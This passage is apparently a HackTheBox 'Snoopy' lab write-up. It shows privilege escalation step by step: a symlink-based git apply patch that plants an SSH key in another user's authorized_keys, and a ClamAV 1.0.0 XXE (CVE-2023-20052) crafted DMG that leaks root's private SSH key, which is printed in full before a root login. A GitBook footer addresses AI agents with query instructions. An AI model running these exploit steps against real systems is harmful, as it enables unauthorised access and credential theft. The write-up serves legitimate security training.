The below commit can be used to understand the code behind it

{% embed url="<https://github.com/git/git/commit/c867e4fa180bec4750e9b54eb10f459030dbebfd>" %}

Inspecting the commit further, we can see in [t/t4115-apply-symlink.sh](https://github.com/git/git/commit/c867e4fa180bec4750e9b54eb10f459030dbebfd#diff-d37fceb39eb9394533430ff8956cad41dd7f9233672dc778fd5690625906069f) how it could potentially be exploited:

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FAS0eYy7z08edQg8uUFAE%2Fimage.png?alt=media&amp;token=f5b3e141-e25e-4807-b8de-906abd7e9ea2" alt=""><figcaption></figcaption></figure>

Before starting working i have set the global variables so that git wont throw at me in between processes.

```bash
cbrown@snoopy:/tmp$ mkdir second && cd second
cbrown@snoopy:/tmp/second$ git config --global user.name "cbrown"
cbrown@snoopy:/tmp/second$ git config --global user.email "cbrown@snoopy.htb"
cbrown@snoopy:/tmp/second$ git config --global init.defaultBranch main
```

Next Initialize the git repo.

```bash
cbrown@snoopy:/tmp/second$ git init
Initialized empty Git repository in /tmp/second/.git/
```

next create an symbolic link to sbrown user .ssh directory.

```bash
cbrown@snoopy:/tmp/exploit/second$ ln -s /home/sbrown/.ssh symlink
cbrown@snoopy:/tmp/exploit/second$ git add symlink
cbrown@snoopy:/tmp/exploit/second$ git commit -m "add symlink"
[main (root-commit) 57c57fc] add symlink
 1 file changed, 1 insertion(+)
 create mode 120000 symlink
cbrown@snoopy:/tmp/exploit/second$ ls
symlink
cbrown@snoopy:/tmp/exploit$ chmod 777 second
```

create a ssh key that will used in the patch to write to the sbrown directory

```bash
┌──(ajay㉿kali)-[~]
└─$ ssh-keygen -t rsa -f ~/.ssh/id_rsa -N ""
Generating public/private rsa key pair.
Your identification has been saved in /home/ajay/.ssh/id_rsa
Your public key has been saved in /home/ajay/.ssh/id_rsa.pub
The key fingerprint is:
SHA256:CiA5TpbC4O0PJY+HJTLxqffs4YFomMyliMGtps/xhRs ajay@kali
The key's randomart image is:
+---[RSA 3072]----+
|..               |
|+.= .            |
|=O.* o           |
|*o*.O            |
|.+ O.o  S        |
|*o* Bo .         |
|=O..E*o          |
|+. oo+o          |
|..o oo           |
+----[SHA256]-----+
                                                                                                                     
┌──(ajay㉿kali)-[~]
└─$ cat ~/.ssh/id_rsa.pub
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQC2fJL1VIfrs2HFg2KSNYruApit+cclteFT9stgihvW4il1TM5J2iqwg7oHThh3xPHsrpjvIhks11ccudl0Fm3NVsdH4GOh+dGLezEh5PlOFd3QxV+Qwxj4D8BzQR1l0wvMfhKyVJyzOkt60yEdoJ9mMguNYfozZO8fUaKsqZTWQ50XX0VL1B9jcdFhEmIarHbSZBB3cw1nKLDI8unn/KkHXHvWhs15Qn75wJWhqN29Znz4odTNssSXNJUU+lxhYP7Xtb68/fuo9Ruw10tcp52kz+ggOeiO8tAFX9noTDF7ve7/0q/dx04KT3JmqpHMoX+BB0yIK1jS0778YfH4htNdCGYsje6wGmgcYU54xSeLLWooUnKF9rXrHUyq008BMbCJErGu3eBvI+mgWZuaDjDGgMRebPS7zRATXOaAsThuG96wQSDCjR3vKgsW4MCQypQWHsiVekALfLE5PLIQ4+eBzmBMl8yEmO6Vy99sDg+uQrGoiBYjzwVG5jyscpkkv/U= ajay@kali
```

Next using the key write the patch to apply.

```bash
diff --git a/symlink b/renamed-symlink
similarity index 100%
rename from symlink
rename to renamed-symlink
--
diff --git /dev/null b/renamed-symlink/authorized_keys
new file mode 100644
index 0000000..039727e
--- /dev/null
+++ b/renamed-symlink/authorized_keys
@@ -0,0 +1,1 @@
+ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQC2fJL1VIfrs2HFg2KSNYruApit+cclteFT9stgihvW4il1TM5J2iqwg7oHThh3xPHsrpjvIhks11ccudl0Fm3NVsdH4GOh+dGLezEh5PlOFd3QxV+Qwxj4D8BzQR1l0wvMfhKyVJyzOkt60yEdoJ9mMguNYfozZO8fUaKsqZTWQ50XX0VL1B9jcdFhEmIarHbSZBB3cw1nKLDI8unn/KkHXHvWhs15Qn75wJWhqN29Znz4odTNssSXNJUU+lxhYP7Xtb68/fuo9Ruw10tcp52kz+ggOeiO8tAFX9noTDF7ve7/0q/dx04KT3JmqpHMoX+BB0yIK1jS0778YfH4htNdCGYsje6wGmgcYU54xSeLLWooUnKF9rXrHUyq008BMbCJErGu3eBvI+mgWZuaDjDGgMRebPS7zRATXOaAsThuG96wQSDCjR3vKgsW4MCQypQWHsiVekALfLE5PLIQ4+eBzmBMl8yEmO6Vy99sDg+uQrGoiBYjzwVG5jyscpkkv/U= ajay@kali
```

next apply the patch

```bash
cbrown@snoopy:/tmp/exploit/second$ sudo -u sbrown /usr/bin/git apply -v patch
Checking patch symlink => renamed-symlink...
Checking patch renamed-symlink/authorized_keys...
Applied patch symlink => renamed-symlink cleanly.
Applied patch renamed-symlink/authorized_keys cleanly.
cbrown@snoopy:/tmp/exploit/second$ 
```

## Shell as SBROWN

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FD2DXXMlBLRJHZ7zKNSOh%2Fimage.png?alt=media&amp;token=1c6a17fb-8c61-4a83-a4d6-90a1318a3930" alt=""><figcaption></figcaption></figure>

```bash
sbrown@snoopy:~$ sudo -l
Matching Defaults entries for sbrown on snoopy:
    env_keep+="LANG LANGUAGE LINGUAS LC_* _XKB_CHARSET", env_keep+="XAPPLRESDIR XFILESEARCHPATH XUSERFILESEARCHPATH", secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin, mail_badpass

User sbrown may run the following commands on snoopy:
    (root) NOPASSWD: /usr/local/bin/clamscan ^--debug /home/sbrown/scanfiles/[a-zA-Z0-9.]+$
sbrown@snoopy:~$ 

sbrown@snoopy:~$ /usr/local/bin/clamscan --version
ClamAV 1.0.0/26853/Fri Mar 24 07:24:11 2023
```

ClamAV version is **1.0.0**, which is vulnerable to **CVE-2023-20052** — an XXE in the DMG file parser that allows reading arbitrary files during a scan.

### Abusing DMG using public repo

```bash
──(ajay㉿kali)-[~/CVE-2023-20052]
└─$ sudo docker build -t cve-2023-20052 .                        
[+] Building 41.4s (17/17) FINISHED                                                                                                                                                                                          docker:default
 => [internal] load build definition from Dockerfile                                                                                                                                                                                   0.0s
 => => transferring dockerfile: 633B                                                                                                                                                                                                   0.0s
 => [internal] load metadata for docker.io/library/ubuntu:22.04                                                                                                                                                                        0.2s 
 => [internal] load .dockerignore                                                                                                                                                                                                      0.0s
 => => transferring context: 2B                                                                                                                                                                                                        0.0s 
 => [ 1/13] FROM docker.io/library/ubuntu:22.04@sha256:4f838adc7181d9039ac795a7d0aba05a9bd9ecd480d294483169c5def983b64d                                                                                                                0.0s 
 => CACHED [ 2/13] RUN apt-get update                                                                                                                                                                                                  0.0s 
 => CACHED [ 3/13] RUN apt-get install -y ca-certificates gnupg wget                                                                                                                                                                   0.0s 
 => [ 4/13] RUN echo 'Acquire::Check-Valid-Until "false";' > /etc/apt/apt.conf.d/99archive                                                                                                                                             0.2s 
 => [ 5/13] RUN echo "deb [trusted=yes] http://archive.debian.org/debian-security stretch/updates main" >> /etc/apt/sources.list                                                                                                       0.4s
 => [ 6/13] RUN apt-get -o Acquire::AllowInsecureRepositories=true update                                                                                                                                                              2.3s
 => [ 7/13] RUN apt-get install -y libssl1.0-dev gcc g++ cmake zlib1g-dev genisoimage bbe git                                                                                                                                         25.2s
 => [ 8/13] RUN git clone https://github.com/planetbeing/libdmg-hfsplus.git                                                                                                                                                            6.7s 
 => [ 9/13] WORKDIR /libdmg-hfsplus                                                                                                                                                                                                    0.0s 
 => [10/13] RUN cmake .                                                                                                                                                                                                                0.8s 
 => [11/13] RUN make                                                                                                                                                                                                                   2.5s 
 => [12/13] RUN cp dmg/dmg /bin                                                                                                                                                                                                        0.4s 
 => [13/13] WORKDIR /exploit                                                                                                                                                                                                           0.0s 
 => exporting to image                                                                                                                                                                                                                 2.5s 
 => => exporting layers                                                                                                                                                                                                                2.5s 
 => => writing image sha256:854169e25299858373624a4d022934b06722c8fe911ba4918923eb2f5cec6510                                                                                                                                           0.0s 
 => => naming to docker.io/library/cve-2023-20052                                                                                                                                                                                      0.0s 
                                                                                                                                                                                                                                            
┌──(ajay㉿kali)-[~/CVE-2023-20052]
└─$ sudo docker run -v $(pwd):/exploit -it cve-2023-20052 bash
root@15ff4fa57934:/exploit# genisoimage -D -V "exploit" -no-pad -r -apple -file-mode 0777 -o test.img . && dmg dmg test.img test.dmg
genisoimage: Warning: no Apple/Unix files will be decoded/mapped
Total translation table size: 0
Total rockridge attributes bytes: 6816
Total directory bytes: 34816
Path table size(bytes): 224
Max brk space used 22000
127 extents written (0 MB)
Processing DDM...
No DDM! Just doing one huge blkx then...
run 0: sectors=508, left=508
Writing XML data...
Generating UDIF metadata...
Master checksum: 3019446d
Writing out UDIF resource file...
Cleaning up...
Done

root@15ff4fa57934:/exploit# bbe -e 's|<!DOCTYPE plist PUBLIC "-//Apple Computer//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">|<!DOCTYPE plist [<!ENTITY xxe SYSTEM "/root/.ssh/id_rsa"> ]>|' -e 's/blkx/&xxe\;/' test.dmg -o exploit.dmg

root@15ff4fa57934:/exploit# ls
1.png  2.png  Dockerfile  README.md  exploit.dmg  test.dmg  test.img
root@15ff4fa57934:/exploit#    
```

Next send the file to the ssh shell of sbrown.

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FdKtNMwMDGCCS4QBXoUpd%2Fimage.png?alt=media&amp;token=00c3b93e-a9d5-4b8d-8ff2-0a33540c8a5d" alt=""><figcaption></figcaption></figure>

```bash
sbrown@snoopy:~$ sudo /usr/local/bin/clamscan --debug /home/sbrown/scanfiles/exploit.dmg
LibClamAV debug: searching for unrar, user-searchpath: /usr/local/lib
LibClamAV debug: unrar support loaded from /usr/local/lib/libclamunrar_iface.so.11.0.0
LibClamAV debug: Initialized 1.0.0 engine
LibClamAV debug: Initializing phishcheck module
LibClamAV debug: Phishcheck: Compiling regex: ^ *(http|https|ftp:(//)?)?[0-9]{1,3}(\.[0-9]{1,3}){3}[/?:]? *$
LibClamAV debug: Phishcheck module initialized
LibClamAV debug: Bytecode initialized in interpreter mode
LibClamAV debug: Loading databases from /usr/local/share/clamav
LibClamAV debug: in cli_cvdload()
LibClamAV debug: MD5(.tar.gz) = 9329f8df2b9928baea0ee2cfebb8baab
LibClamAV debug: cli_versig: Decoded signature: 9329f8df2b9928baea0ee2cfebb8baab
LibClamAV debug: cli_versig: Digital signature is correct.
LibClamAV Warning: **************************************************
LibClamAV Warning: ***  The virus database is older than 7 days!  ***
LibClamAV Warning: ***   Please update it as soon as possible.    ***
LibClamAV Warning: **************************************************
LibClamAV debug: in cli_tgzload()
LibClamAV debug: daily.info loaded
LibClamAV debug: in cli_tgzload_cleanup()
LibClamAV debug: in cli_tgzload()
LibClamAV debug: daily.cfg loaded
LibClamAV debug: daily.ign loaded
<SNIP>
-----BEGIN OPENSSH PRIVATE KEY-----
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
-----END OPENSSH PRIVATE KEY-----

```

copy the private key of root and login as ssh root.

## Shell as Root

```bash
┌──(ajay㉿kali)-[~]
└─$ chmod 600 rootid_rsa 
                                                                                                                                                                                                                                            
┌──(ajay㉿kali)-[~]
└─$ ssh -i rootid_rsa root@10.129.8.55      
Welcome to Ubuntu 22.04.2 LTS (GNU/Linux 5.15.0-71-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

This system has been minimized by removing packages and content that are
not required on a system that users do not log into.

To restore this content, you can run the 'unminimize' command.
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings

Last login: Fri May 12 21:28:56 2023 from 10.10.14.46
root@snoopy:~# ls
clamav-1.0.0.linux.x86_64.deb  clean.sh  containers  db.snoopy.htb  git_2.34.1-1ubuntu1.6_amd64.deb  named_restore.sh  root.txt  sudo_1.9.13-4_ubu2204_amd64.deb
root@snoopy:~# more root.txt
******************************
root@snoopy:~# 

```


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter, and the optional `goal` query parameter:

```
GET https://ajaykumar-kanthi.gitbook.io/write-ups/hackthebox-cpts-track/htb-snoopy.md?ask=<question>&goal=<endgoal>
```

`ask` is the immediate question: it should be specific, self-contained, and written in natural language.
`goal` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal.

The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.
